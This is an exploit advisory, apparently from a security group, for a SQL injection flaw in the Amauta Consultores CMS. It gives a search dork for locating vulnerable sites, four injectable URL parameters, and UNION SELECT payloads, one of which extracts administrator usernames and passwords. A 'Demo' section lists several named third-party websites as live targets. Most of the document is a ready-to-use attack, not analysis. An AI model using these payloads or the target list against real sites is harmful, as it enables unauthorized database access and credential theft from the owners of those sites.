Amauta Consultores CMS suffers from a remote SQL injection vulnerability.
66774822deb03d3e16996653b85c7b137783d09413a52a6a33d6057fd9022257
########################################################################################
# #
# Exploit Title : AMAUTA CONSULTORES CMS SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Vendor : www.amautaperu.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by AMAUTA CONSULTORES S.A.C" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/node_events.php?id=[sqli] #
# http://[TarGeT]/node_news.php?idnew=[sqli] #
# http://[TarGeT]/node.php?id=[sqli*] #
# http://[TarGeT]/photos.php?id=[*sqli] #
# #
# [sqli*] : #
# #
# -9999+Union+select+1,2,3,version()-- #
# #
# [*sqli] : #
# #
# -1+union+select+1,2,group_concat(user_name,0x3a,user_password)+from+administrators--#
# #
# #
# Demo : #
# #
# http://perupromotions.co.uk/photos.php?id=[*sqli] #
# http://www.petaliecapricci.it/index.asp?p=credits' #
# http://www.teknosbologna.it/index.asp?p=credits' #
# http://www.mydylandog.it/index.asp?p=credits' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################